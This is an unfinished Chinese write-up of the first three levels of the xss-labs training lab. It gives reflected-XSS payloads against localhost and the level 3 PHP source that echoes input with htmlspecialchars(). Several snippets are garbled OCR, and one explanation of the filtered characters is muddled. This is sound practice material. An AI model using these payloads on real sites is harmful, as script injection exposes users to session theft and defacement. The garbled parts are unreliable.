其他分享
首页 > 其他分享> > xss-labs通关记录

xss-labs通关记录

作者:互联网

0、写在前面

挖坑,待更新。

1、无过滤

简单关卡,随便找一个常用代码(如script、img等)填入即可。

http://localhost/xss-labs/level1.php?name=<script>alert(1)</script>

 

2、简单标签闭合

刚进入第二关的url:

http://localhost/xss-labs/level2.php?keyword=test

• < f Or•fi method: "GET" > 
< input 
< input 
< / form> 
< / center>

如题,非常简单的进行一个标签的闭合即可。

http://localhost/xss-labs/level2.php?keyword="><script>alert(1);</script> //

 

3、闭合+ htmlspecialchars()

1)先用<script>alert(1)</script>进行一波试探,结果如下:

< body > 
Chl 
(form action-leve13.php method-GET> 
<input name-keyword value- "It; > 
type—submit name—submit / >

可以看到<>被过滤了,查看一下源码方便理解:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

2)PHP htmlspecialchars() 函数:把一些预定义的字符转换为 HTML 实体。

预定义的字符是:

虽然过滤了"(双引号)和<(单引号),但’(单引号)还是你单引号

标签:xss,http,alert,labs,&#,2538122,php,通关
来源: https://www.cnblogs.com/kinyoobi/p/15336669.html